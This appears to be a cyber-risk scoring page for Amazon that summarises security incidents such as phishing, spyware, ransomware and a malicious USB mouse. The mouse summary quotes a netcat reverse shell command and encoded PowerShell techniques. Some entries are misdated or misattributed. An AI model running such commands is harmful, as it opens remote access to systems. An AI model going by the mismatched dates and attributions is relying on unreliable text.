Amazon A.I CyberSecurity Scoring
Amazon
Company Information
Website: https://www.aboutamazon.com/
Number of employees: 772,896
Number of followers: 35,933,128
NAICS: 5112
Industry Type: Software Development
Homepage: aboutamazon.com
Amazon Risk Score (AI oriented)
Between 750 and 799
Amazon, Software Development
Updated: 14/06/2026
795/1000
Fair
Baa
Amazon Global Score (TPRM)
Score locked

Amazon: Fair
Current Score
795 Baa (FAIR)
Scale: 0 to 1000
13 incidents
-5.7 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
795
MAY 2026
794
APRIL 2026
800
Cyber Attack
16 Apr 2026 • Amazon
Amazon, Temu, Sam’s Club, Grubhub, Lyft, CountryMax and Elf Cosmetics: Misconfigured Server Run by Hackers Leaks 345,000 Stolen Credit Cards
AI Coding Error Exposes Massive Stolen Credit Card Database
793
HIGH-7
ELFTEMCOUGRUAMASAMLYF1777580773
On 16 April, cybersecurity researchers uncovered a misconfigured server linked to Jerry’s Store, a dark web carding marketplace where hackers verify stolen credit cards. The leak stemmed from an AI-assisted coding mistake, revealing the group’s entire database including 345,000 credit cards, of which 145,000 were active.
The hackers used Cursor, an AI-powered code editor, to build a statistics dashboard. However, the AI generated an unauthenticated open web directory instead of a secure page, exposing the server to public access. Researchers found that Cursor’s lack of safety guardrails allowed the tool to assist in criminal activity without intervention, despite recognizing its use for credit card fraud.
The group tested stolen cards by making small transactions on major platforms, including Amazon (US & JP), Grubhub, Sam’s Club, Temu, Lyft, Elf Cosmetics, and CountryMax. Successful payments confirmed a card’s validity, increasing its dark web value ($7 to $18 per card), with the full dataset potentially worth $2.6 million.
The exposed data included card numbers, security codes, cardholder names, and home addresses. Jerry’s Store, launched in late 2023, appears to be operated by a Chinese-speaking individual, though the server was hosted in Germany, likely via a bulletproof hosting provider to evade detection.
While the incident highlights risks in AI-assisted development, researchers noted that the leak also disrupted criminal operations by exposing their methods. Cursor has not yet responded to the findings.
MARCH 2026
801
Cyber Attack
01 Mar 2026 • Amazon
Amazon: Scammers pose as Amazon support to steal your account
Amazon Phishing Scam Targets Customers with Fake Product Recall Emails
796
CRITICAL-5
AMA1775744757
Cybercriminals are exploiting Amazon’s vast customer base, reportedly 310 million active users, by impersonating the retail giant in a wave of phishing attacks. The latest campaign uses a "product recall" lure, sending emails claiming a purchased item has a safety defect requiring immediate attention.
The fraudulent messages, spotted by The Mirror, read: “Dear Customer, we are writing to inform you of a product recall affecting an item from your March 2026 order due to a design defect that may pose a potential safety risk.” The emails are deliberately vague, increasing the likelihood that recipients will assume the notice applies to them. Links in the message redirect victims to fake Amazon login pages designed to steal credentials.
This tactic mirrors previous "spray and pray" phishing schemes, where scammers cast a wide net with generic but plausible messages. The holiday season saw a surge in Amazon account takeovers (ATOs), and this latest variation shows no signs of slowing.
Amazon customers who receive such emails are advised to avoid clicking links and instead verify messages through the official app or website. Legitimate communications from Amazon appear in the account’s Message Center. Those who fall victim should immediately change their passwords, enable two-factor authentication, and monitor financial accounts for unauthorized activity.
The scam has been reported in the UK, with similar tactics likely targeting users globally. Authorities recommend reporting phishing attempts to Amazon and forwarding suspicious texts or emails to designated spam-reporting channels.
FEBRUARY 2026
801
Vulnerability
12 Feb 2026 • Amazon
Microsoft, Amazon and Apple: $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems
EvilMouse: A $44 USB Mouse That Silently Hijacks Systems
800
CRITICAL-1
AMAAPPMIC1770935300
Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures.
Unlike suspicious USB drives, EvilMouse retains normal mouse functionality (optical tracking and buttons) while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks in seconds.
The device executes DuckyScript-like sequences, including:
- Hidden PowerShell commands (`-WindowStyle Hidden -enc`)
- Base64-encoded payloads for obfuscation
- Reverse shells via Netcat (`nc -e cmd.exe attacker_ip 4444`)
- Persistence mechanisms (e.g., scheduled tasks)
In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma.
### Security Implications
EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments.
### Potential Defenses
- USB device whitelisting (Group Policy)
- Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)
- Physical port controls (Kensington locks)
The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses.
EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.
FEBRUARY 2026
807
Cyber Attack
10 Feb 2026 • Amazon
ConnectWise, Datto, SmartVault, SimpleHelp and Amazon: Microsoft Warns IRS Phishing Hits 29,000 Users, Deploys RMM Malware
Microsoft Warns of Tax-Season Phishing Surge Targeting U.S. Organizations
801
CRITICAL-6
SMASIMCONAMADAT1775551328
Microsoft has identified a wave of phishing campaigns exploiting the U.S. tax season to steal credentials and deploy malware. Threat actors are leveraging urgent, time-sensitive lures such as fake refund notices, payroll forms, and IRS impersonations to trick recipients into interacting with malicious links, QR codes, or attachments.
The attacks disproportionately target accountants, tax professionals, and industries handling sensitive financial data, including manufacturing, retail, healthcare, and higher education. Some campaigns use Phishing-as-a-Service (PhaaS) platforms like Energy365 and SneakyLog (Kratos) to harvest credentials, including two-factor authentication (2FA) codes, via spoofed Microsoft 365 login pages. Others deploy remote monitoring and management (RMM) tools such as ConnectWise ScreenConnect, Datto, and SimpleHelp to gain persistent access to compromised systems.
Key campaigns include:
- CPA-themed phishing using the Energy365 kit, sending hundreds of thousands of malicious emails daily.
- QR code and W-2 lures targeting ~100 U.S. organizations in manufacturing, retail, and healthcare, redirecting victims to fake Microsoft 365 sign-in pages.
- IRS impersonation with cryptocurrency tax form scams, distributing ScreenConnect or SimpleHelp via domains like irs-doc[.]com.
- Datto malware delivery via fake tax-filing assistance links sent to accountants.
- A large-scale February 10, 2026, attack affecting 29,000 users across 10,000 organizations, primarily in financial services, tech, and retail. Emails, sent via Amazon SES, claimed irregular tax returns under recipients’ Electronic Filing Identification Numbers (EFINs) and directed users to a fake SmartVault site (smartvault[.]im) to download a malicious ScreenConnect installer.
The campaigns highlight a 277% year-over-year surge in RMM tool abuse, with attackers daisy-chaining multiple tools to evade detection. Since RMM software is often trusted in corporate environments, unauthorized usage can go unnoticed, complicating attribution and response efforts.
FEBRUARY 2026
822
Breach
05 Feb 2026 • Amazon
Amazon: Employment information leaks: crisis management lessons from Amazon’s email blunder
Amazon’s Email Blunder Highlights Risks of Employment Data Leaks
806
HIGH-16
AMA1770339008
A recent misstep by Amazon underscored the severe consequences of accidental employment data leaks, demonstrating how a simple communications error can escalate into a full-blown crisis. The incident involved the premature or unintended disclosure of internal employee information, likely through a leaked calendar invite or automated email, triggering legal, reputational, and employee relations fallout.
Such breaches are particularly damaging in sectors like legal and corporate environments, where sensitive data handling is critical. The fallout from Amazon’s blunder serves as a cautionary example for organizations, emphasizing the need for robust crisis management protocols when handling confidential employee or client information.
The event also highlights broader cybersecurity risks facing industries reliant on digital communication, including the legal sector. As regulatory frameworks like GDPR (EU/UK) impose strict data protection requirements, organizations must prioritize compliance to mitigate risks of breaches, fines, and reputational harm. The UK’s Information Commissioner’s Office (ICO) remains a key authority overseeing such incidents, reinforcing the importance of proactive regulatory intelligence.
While the specifics of Amazon’s case remain under scrutiny, the incident reinforces the growing threat of human error in cybersecurity, where a single oversight can have cascading effects. For businesses, the lesson is clear: even minor lapses in communication security can lead to significant legal and operational consequences.
FEBRUARY 2026
827
Cyber Attack
02 Feb 2026 • Amazon
Google, Facebook, Instagram, Amazon, Flipkart, Paytm, Coinbase and PayPal: ZeroDayRAT Malware Strikes Android and iOS Devices for Real-Time Spying
ZeroDayRAT: A Rising Mobile Spyware Threat with Global Reach
822
CRITICAL-5
AMAINSCOIGOOFLIPAYPAYMET1771309885
Since February 2, 2026, ZeroDayRAT, a sophisticated mobile spyware platform, has been sold openly on Telegram channels, offering cybercriminals an accessible tool for large-scale surveillance and financial theft. Developed and marketed through dedicated groups for sales, support, and updates, the malware targets Android (versions 5–16) and iOS (up to version 26, including iPhone 17 Pro) with minimal technical expertise required.
Operators gain real-time control via a browser-based dashboard, enabling live spying, data theft, and financial attacks against victims worldwide. Infections typically begin through social engineering tactics, including smishing texts, phishing emails, fake app stores, or malicious links shared on WhatsApp and Telegram. Once installed, via an APK on Android or a payload on iOS, ZeroDayRAT grants full device access without the victim’s knowledge.
### Surveillance & Data Exfiltration Capabilities
The spyware’s dashboard provides a comprehensive overview of compromised devices, including:
- Device details: Model, OS version, battery level, country, lock status, SIM/carrier info, and dual-SIM numbers.
- User profiling: App usage timelines, peak activity hours, and network providers.
- Real-time notifications: Intercepted alerts from WhatsApp, Instagram, Telegram, YouTube, and system events.
- Location tracking: GPS data mapped on Google Maps, with historical movement records (e.g., a device in Bengaluru).
- Account harvesting: Usernames/emails from Google, WhatsApp, Instagram, Facebook, Amazon, Flipkart, PhonePe, Paytm, and Spotify, enabling account takeovers or follow-up phishing.
- SMS access: Full inbox search, message spoofing, and OTP interception, bypassing SMS-based two-factor authentication (2FA).
### Advanced Surveillance & Financial Theft
ZeroDayRAT escalates beyond passive monitoring with active spying tools:
- Live camera/microphone streams (front/back) synced with GPS for real-time tracking.
- Keylogging: Captures keystrokes, biometrics, gestures, and app launches, paired with a live screen preview to steal passwords and sensitive inputs.
- Crypto theft: Targets wallets like MetaMask, Trust Wallet, Binance, and Coinbase, swapping clipboard addresses to hijack transactions.
- Banking attacks: Compromises UPI apps (PhonePe, Google Pay), Apple Pay, and PayPal via credential overlays, blending traditional and cryptocurrency theft.
### Global Impact
Evidence from the dashboard shows compromised devices in multiple countries, including India and the U.S., underscoring the spyware’s widespread deployment. With its low barrier to entry and commercial availability, ZeroDayRAT represents a growing threat to individual privacy, financial security, and organizational data integrity.
FEBRUARY 2026
832
Cyber Attack
01 Feb 2026 • Amazon
Amazon: Meta AI agent’s instruction causes large sensitive data leak to employees
Meta AI Agent Exposes Sensitive Data in Internal Security Breach
822
LOW-10
AMA1773987972
Meta confirmed an internal security incident in which an AI agent inadvertently exposed a large volume of sensitive company and user data to employees. The breach occurred when an engineer sought guidance on an internal forum, and the AI provided a solution that, when implemented, made the data accessible for two hours. While Meta stated that no user data was mishandled, the incident triggered a major security alert, underscoring the company’s focus on data protection.
The event is part of a growing trend of AI-related disruptions in major tech firms. Amazon recently experienced outages linked to its internal AI tools, with employees citing rushed deployments leading to errors and reduced productivity. The underlying technology, known as agentic AI, has advanced rapidly, enabling autonomous tasks like financial management and system operations but also introducing new risks. Recent examples include AI agents making unauthorized trades or deleting user data, fueling debates about artificial general intelligence (AGI) and its economic impact.
Experts suggest that companies like Meta and Amazon are in the "experimental phase" of AI deployment, often lacking proper risk assessments. Security specialists note that AI agents lack the contextual awareness of human engineers, relying instead on limited "context windows" that can lead to critical oversights. Unlike humans, who accumulate institutional knowledge over time, AI systems require explicit instructions to avoid unintended consequences, making such incidents increasingly likely as adoption accelerates.
JANUARY 2026
833
Vulnerability
26 Jan 2026 • Amazon
Cisco, City of Saint Paul and Minnesota: Ransomware crims abused Cisco 0-day weeks before disclosure
Interlock Ransomware Exploited Zero-Day in Cisco Firewall Before Patch
832
CRITICAL-1
CISSAI1773859283
Ransomware group Interlock exploited a maximum-severity zero-day vulnerability (CVE-2026-20131) in Cisco Secure Firewall Management Center more than a month before the vendor released a patch. The flaw, allowing unauthenticated remote attackers to execute arbitrary Java code as root, was actively abused starting January 26, while Cisco issued fixes on March 4.
Amazon’s CJ Moses, CISO of Amazon Integrated Security, revealed the timeline, stating that the company’s MadPot honeypot network detected exploit traffic tied to Interlock’s infrastructure. A misconfigured server also exposed the group’s attack toolkit, providing defenders with critical intelligence.
### Interlock’s Tactics and Toolkit
Interlock, a ransomware crew active since 2025, has targeted hospitals, medical facilities, and government entities, disrupting critical services, including chemotherapy sessions and pre-surgery appointments, and leaking sensitive data. Victims include Davita (kidney dialysis), Kettering Health, and the city of Saint Paul, Minnesota, where a 43 GB data breach forced a state of emergency.
The group’s post-exploitation toolkit includes:
- A PowerShell script harvesting system details (OS, hardware, services, software, storage, VM inventory, user files, RDP logs, and browser data).
- Custom remote access trojans (RATs) in JavaScript and Java, providing persistent access, command execution, file transfer, and SOCKS5 proxy capabilities.
- A Bash script configuring Linux servers as reverse proxies, wiping logs, and ensuring persistence.
- Memory-resident backdoors and lightweight network beacons to evade detection.
- Legitimate tools like ConnectWise ScreenConnect, Volatility, and Certify to blend malicious activity with authorized remote access.
### Redundant Access and Extortion Tactics
Interlock deploys multiple backdoors, including dual-language implants (JavaScript and Java), to maintain access even if one is detected. Their ransom notes threaten regulatory exposure, leveraging compliance violations alongside data encryption and leaks to pressure victims.
Cisco has updated its security advisory, urging customers to apply patches immediately. The incident underscores the growing sophistication of ransomware groups in exploiting zero-days before public disclosure.
JANUARY 2026
838
Cyber Attack
19 Jan 2026 • Amazon
LastPass and Amazon Web Services: LastPass Warns of Fake Maintenance Message Tracking Users to Steal Master Passwords
Critical Phishing Campaign Targets LastPass Users in Sophisticated Attack
833
CRITICAL-5
LASAMA1769009064
A high-severity phishing campaign targeting LastPass users began on January 19, 2026, with attackers impersonating the company’s support team to steal master passwords. The fraudulent emails falsely claim an urgent need for vault backups within 24 hours, leveraging social engineering to exploit user trust.
LastPass has confirmed that it never requests master passwords or demands immediate vault backups via email, emphasizing that legitimate communications avoid unsolicited urgent actions. The campaign was strategically launched over a U.S. holiday weekend, a tactic designed to capitalize on reduced security staffing and slower incident response times, commonly exploited by threat actors to evade detection.
The phishing infrastructure relies on two key components: an initial redirect hosted on compromised AWS S3 buckets and a spoofed domain mimicking LastPass’s legitimate services. LastPass is actively working with third-party partners to dismantle the malicious infrastructure and urges users to delete any suspicious emails and report them to [email protected] for further analysis.
Organizations are advised to bolster email security controls to block messages from identified sender addresses and reinforce phishing awareness, particularly regarding urgent language and credential requests. The incident underscores the persistent risk of credential harvesting campaigns targeting password manager users.
DECEMBER 2025
831
Vulnerability
25 Dec 2025 • Amazon
Amazon Web Services, Palo Alto Networks, Google Cloud and Wakefield Research: Every organization faced at least one AI-related cyberattack within the last year, says research
Increasing Attacks on AI Systems via Cloud Infrastructure Vulnerabilities
830
LOW-1
AMAUNIGOOWAK1766721300
AI Systems Under Siege: Every Organization Targeted in Past Year, Unit 42 Finds
A new report from Palo Alto Networks’ Unit 42 reveals a stark reality: every organization surveyed has faced at least one attack on its AI systems in the past year. The findings, derived from a survey of over 2,800 participants across 10 countries—including the U.S., UK, Germany, Japan, and India—highlight a growing and systemic vulnerability in AI security, with cloud infrastructure at the heart of the problem.
Conducted between September 29 and October 17, 2025, the research underscores that AI security cannot rely on reactive measures. Instead, organizations must adopt a proactive, scientific approach to safeguarding AI systems, given their complexity and critical applications. The report emphasizes that AI security is inherently tied to cloud infrastructure, where most AI workloads—data storage, model training, and application deployment—reside.
Cloud platforms like AWS, Microsoft Azure, and Google Cloud, while enabling AI scalability, also present prime targets for cyberattacks. Exploitable weaknesses in cloud security can lead to unauthorized access, data theft, or operational disruptions. Traditional security measures often fall short in addressing the unique challenges of AI, such as securing data pipelines, managing identities, and protecting cloud-hosted workloads.
The State of Cloud Security Report 2025 argues that the only effective defense is a holistic approach to cloud security, treating it as foundational to AI protection. This includes enforcing strong policies, encryption standards, regular audits, and isolating AI workloads from cloud vulnerabilities. As AI integrates deeper into sectors like healthcare, finance, and autonomous systems, the stakes rise—breaches could compromise sensitive data, disrupt services, or even endanger lives.
Emerging threats, such as adversarial attacks designed to manipulate AI models, further complicate the landscape. The report calls for collaboration between cloud providers, AI developers, and security teams to build robust frameworks and real-time threat detection tools. The future of AI security hinges on securing the cloud infrastructure that powers it, ensuring resilience against an evolving threat landscape.
NOVEMBER 2025
831
OCTOBER 2025
830
SEPTEMBER 2025
830
AUGUST 2025
829
JULY 2025
829
JANUARY 2020
846
Data Leak
01 Jan 2020 • Amazon
Amazon
Amazon Employee Data Breach
815
MEDIUM-31
AMA21461222
Amazon fired a number of employees after they shared customer email addresses and phone numbers with a third party, in violation of its policies.
No other account-related information was shared.
JUNE 2018
845
Breach
16 Jun 2018 • Amazon
TikTok and Amazon Europe Core: Breach Notifications in Europe Rise, While Fines Hold Steady
TikTok GDPR Violation for Data Transfers to China
823
CRITICAL-22
TIKAMA1769016582
GDPR Enforcement Remains Strong as Breach Notifications Surge in Europe
Data breach notifications across Europe rose by 20% over the past year, even as GDPR fines held steady at €1.2 billion ($1.4 billion) in 2025, according to a report by global law firm DLA Piper. The consistent enforcement levels signal sustained regulatory scrutiny, particularly in areas like AI, supply chain security, and international data transfers.
Ireland remained the most active enforcer, issuing the largest fine of 2025, €530 million, against TikTok for storing European users’ data on Chinese servers between July 2020 and November 2022 without adequate safeguards or transparency. This marked the first major GDPR penalty for data transfers to a non-U.S. country, expanding concerns beyond transatlantic data flows. Ireland also leads in cumulative fines since GDPR’s 2018 inception, with €4 billion in sanctions, followed by France (€1.1 billion) and Luxembourg (€747 million).
Luxembourg’s largest fine, €746 million against Amazon Europe Core in 2021, was upheld in March 2025 after the company’s appeal was dismissed. The case remains under seal due to local legal restrictions. Meanwhile, U.S. tech firms continued to face the highest penalties, reflecting persistent tensions over surveillance-driven business models.
The European Commission proposed GDPR reforms in November 2024 to simplify compliance, including a unified breach reporting platform managed by ENISA and an extended notification deadline from 72 to 96 hours. The changes aim to reduce overlapping obligations under GDPR, the Network and Information Security Directive 2 (NIS2), and the Digital Operational Resilience Act (DORA), though debates over balancing efficiency with privacy rights are ongoing.
In the U.K., enforcement under the post-Brexit Data (Use and Access) Act 2025 has drawn criticism. Over 70 civil society groups and experts urged Parliament to investigate the Information Commissioner’s Office (ICO) after it declined to probe the Ministry of Defense’s 2022 Afghan data breach, which exposed 19,000 individuals fleeing the Taliban. The U.K. government later imposed a super injunction to block public reporting. The new DUA Act, effective June 2025, introduces structural reforms to the ICO, including enhanced investigative powers and transparency requirements.
JANUARY 2016
845
Cyber Attack
01 Jan 2016 • Amazon
Amazon
Amazon Customer Service Social Engineering Incident
843
CRITICAL-2
AMA0417522
An Amazon customer service representative was tricked into disclosing the personal information of a user, Eric Springer, by an attacker who used social engineering techniques.
The attack, initiated through the mail, ended with the attacker obtaining the credit card details along with the address and other details.
The incident was widely highlighted on the internet, and people on the web demanded that employees be given social engineering training to prevent such incidents in the future.
Frequently Asked Questions
What is the current A.I Rankiteo Cyber Score for Amazon?
What was Amazon's A.I Rankiteo Cyber Score in May 2026?
What was Amazon's A.I Rankiteo Cyber Score in April 2026?
What was Amazon's A.I Rankiteo Cyber Score in March 2026?
What was Amazon's A.I Rankiteo Cyber Score in February 2026?
What was Amazon's A.I Rankiteo Cyber Score in January 2026?
What was Amazon's A.I Rankiteo Cyber Score in December 2025?
What was Amazon's A.I Rankiteo Cyber Score in November 2025?
What was Amazon's A.I Rankiteo Cyber Score in October 2025?
What was Amazon's A.I Rankiteo Cyber Score in September 2025?
What was Amazon's A.I Rankiteo Cyber Score in August 2025?
What was Amazon's A.I Rankiteo Cyber Score in July 2025?
What is the average per-incident point impact on Amazon's A.I Rankiteo Cyber Score over the past 12 months?
Where can I access detailed records of all cyber incidents associated with Amazon?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
Where can I view Amazon's profile page on Rankiteo?
How accurate is the A.I Rankiteo Risk Scoring methodology?